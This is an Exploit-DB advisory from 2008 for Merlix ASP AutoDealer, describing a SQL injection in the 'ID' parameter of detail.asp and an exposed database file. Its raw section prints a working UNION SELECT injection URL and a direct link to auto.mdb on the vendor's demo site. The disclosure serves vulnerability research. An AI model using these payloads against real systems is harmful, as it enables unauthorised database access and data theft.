Tunisia Muslim

vendor:

ASP AutoDealer

by:

AlpHaNiX

7.5

CVSS

HIGH

SQL Injection & Database Disclosure

89, 200

CWE

Product Name: ASP AutoDealer

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'ID' parameter of the 'detail.asp' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Also, the application discloses the database file 'auto.mdb' which contains sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Also, sensitive information should not be disclosed.

Source

Exploit-DB raw data:

###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


---------------------------- Tunisia Muslim ------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX
#website  : www.offensivetrack.org

#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Merlix ASP AutoDealer
#download : null
#Demo     : http://demo.merlix.com/autodealer/



#Exploits :

--=[SQL INJECTION]=--
http://demo.merlix.com/autodealer/detail.asp?ID=-0+union+select+1,null,null,0,null,CDDoorID,null,null,null,null,CDDoorName,null,null,null,null,null,17+from+CDDOOR



--=[DATABASE DISCLOSURE]=--
http://demo.merlix.com/autodealer/auto.mdb


#Greetz For -|-Me!sTeR-|-

###########################################################################

# milw0rm.com [2008-12-05]